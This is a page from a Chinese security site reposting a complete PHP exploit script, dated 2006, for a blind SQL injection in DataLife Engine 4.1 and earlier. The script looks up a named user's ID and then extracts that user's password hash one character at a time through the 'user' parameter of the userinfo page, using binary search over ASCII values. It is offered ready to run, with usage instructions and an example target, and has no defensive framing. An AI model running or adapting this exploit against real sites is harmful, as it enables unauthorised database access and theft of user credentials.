首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DataLife Engine <= 4.1 Remote SQL Injection Exploit (php)
来源:http://rst.void.ru 作者:1dt.w0lf 发布时间:2006-06-22  

<?php
error_reporting (E_ERROR);
ini_set("max_execution_time",0);

echo '
+========================================+
| RST/GHC Datalife SQL injection exploit |
+========================================+
< > Lite Version for DLE <=4.1 < >
';

if ($argc < 2 ){
print " Usage: " . $argv[0] . " <host> <user> [table prefix]\n";
print " ex.: " . $argv[0] . " datalife.engine.net admin\n";
credits();
exit;
}

//DEFINE USER ID
$urla = 'http://' . $argv[1] . '/index.php?subaction=userinfo&user=' . $argv[2];
$result = file_get_contents($urla);
$str1 = 'user='; #index.php?do=pm&doaction=newpm&user=
$position = strpos($result, $str1);

if ($position === false){ print "\n\rSorry, no match found for user " . $argv[2]; credits();}
$str2 = '">';
$pos = strpos($result, $str2, $position);
$pos1 = $position+5;
$user_id = intval(substr($result, $pos1, $pos-$pos1));

print "Trying to get hash for password of user ". $argv[2] ." with id=" . $user_id . ":\n";

//SOME defines (aka CONFIG =))
if (empty($argv[3])){ $prefix = 'dle_';} #define prefix of the tables. try to find it yourself =) it is easy =)
else {$prefix = $argv[3];}
$min = 48; # 0
$max = 122; # z
if (check(">$min", 1) == 0 && check("<$max", 1) == 0) {print "\n Site is unvulnerable..."; credits();}
for ($sn=1; $sn <= 32; $sn++) {
blind($sn, $min, $max);
}
credits();


// REQUEST function
function check($crcheck, $sn)
{
global $argv, $user_id, $prefix;
$host = 'http://' . $argv[1] . '/index.php'; # argv[1] - host
$name = $argv[2]; #user name
$query = '?subaction=userinfo&user=' . $name .'%2527%20and%20ascii(substring((SELECT%20password%20FROM%20' . $prefix. 'users%20WHERE%20user_id='. $user_id .'),' . $sn . ',1))' .$crcheck . '/*'; #

$http = $host . $query;
#DEBUG
#print $http . "\n";
$result = file_get_contents($http);

// checking the answer
$string = ': '.$name.'</h2>'; #CORRECT it FOR your version, kids =)
#good idea is: 'do=pm&doaction=newpm&user='.$user_id;

if (eregi($string, $result)) { return 1; }

return 0;
}

//range function
function blind($sn, $fmin, $fmax)
{
if (($fmax-$fmin)<5) { if (crack($fmin, $fmax, $sn) == 0){print "\n\rEXPLOIT FAILED..."; credits();} return;}
$compare = intval($fmin + ($fmax-$fmin)/2);
$crcheck = ">". $compare;
if ( check($crcheck, $sn) == 1 ) {
blind($sn, $compare, $fmax);
}
else {
blind($sn, $fmin, $compare+1); }
}

//brute function
function crack($cmin, $cmax, $sn)
{
for ($i=$cmin; $i <=$cmax; $i++){
$crcheck = "=$i";
if (check($crcheck, $sn) == 1){print chr($i); return 1;}
}
return 0;
}


function credits(){
print "\n\n+========================================+\n\r Credits: 1dt.w0lf & foster \n\r Copyright (c) RST/GHC";
print "\n\r http://rst.void.ru && http://ghc.ru\n\r+========================================+\n";
exit;
}

?>



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DataLife Engine <= 4.1 Remo
·Jaws <= 0.6.2 (Search gadge
·Winamp <= 5.21 (Midi File H
·BitchX <= 1.1-final do_hook
·Microsoft Excel Unicode Local
·XM Easy Personal FTP Server 5.
·Joomla <= 1.0.9 (Weblinks)
·MyBulletinBoard (MyBB) <= 1
·FlashBB <= 1.1.5 (phpbb_roo
·DeluxeBB <= 1.07 (cp.php) C
·Mambo <= 4.6rc1 (Weblinks)
·DreamAccount <= 3.1 (auth.a
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved